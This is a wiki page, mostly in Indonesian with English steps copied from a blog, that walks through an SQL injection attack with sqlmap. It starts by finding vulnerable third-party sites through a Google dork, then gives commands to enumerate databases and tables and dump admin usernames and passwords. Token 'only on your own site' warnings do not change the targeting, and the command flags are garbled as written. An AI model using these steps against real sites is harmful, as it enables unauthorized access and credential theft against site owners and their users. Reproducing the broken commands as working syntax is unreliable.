Sqlmap: memperoleh password database sql

From OnnoWiki
Revision as of 05:24, 14 November 2014 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/


Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.


Step 1 – Google search php?=id1

Cari di Google, keyword 

php?=id1

Jika sudah dapat URL-nya dari Google, Tambahkan sebuah quote di akhir URL-nya sehingga menjadi 

http://alamatweb.com/index.php?=id1′


If you get an error the website is vulnerable.

Go to step 2. If this is your own website – shut it down immediately. You need to secure it before you bring it back online.

Step 2 – Kali SQLMAP – get website databases 

SQLMAP   – u http:\\website.com/page.php?id=1 –dbs

This will fetch all available databases on the website. Did you see them listed?

Step 3 – Find the LOGIN table 

SQLMAP   – u http:\\website.com/page.php?id=1 –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!

Step 4 – Get all the Login Data (from Step 3) 

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

Step 5 – Get Usernames (& Admin) 

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump

Look for “admin”

Step 6 – Get Passwords (of Admin) 

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

That’s it.




Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Sqlmap:_memperoleh_password_database_sql&oldid=41313"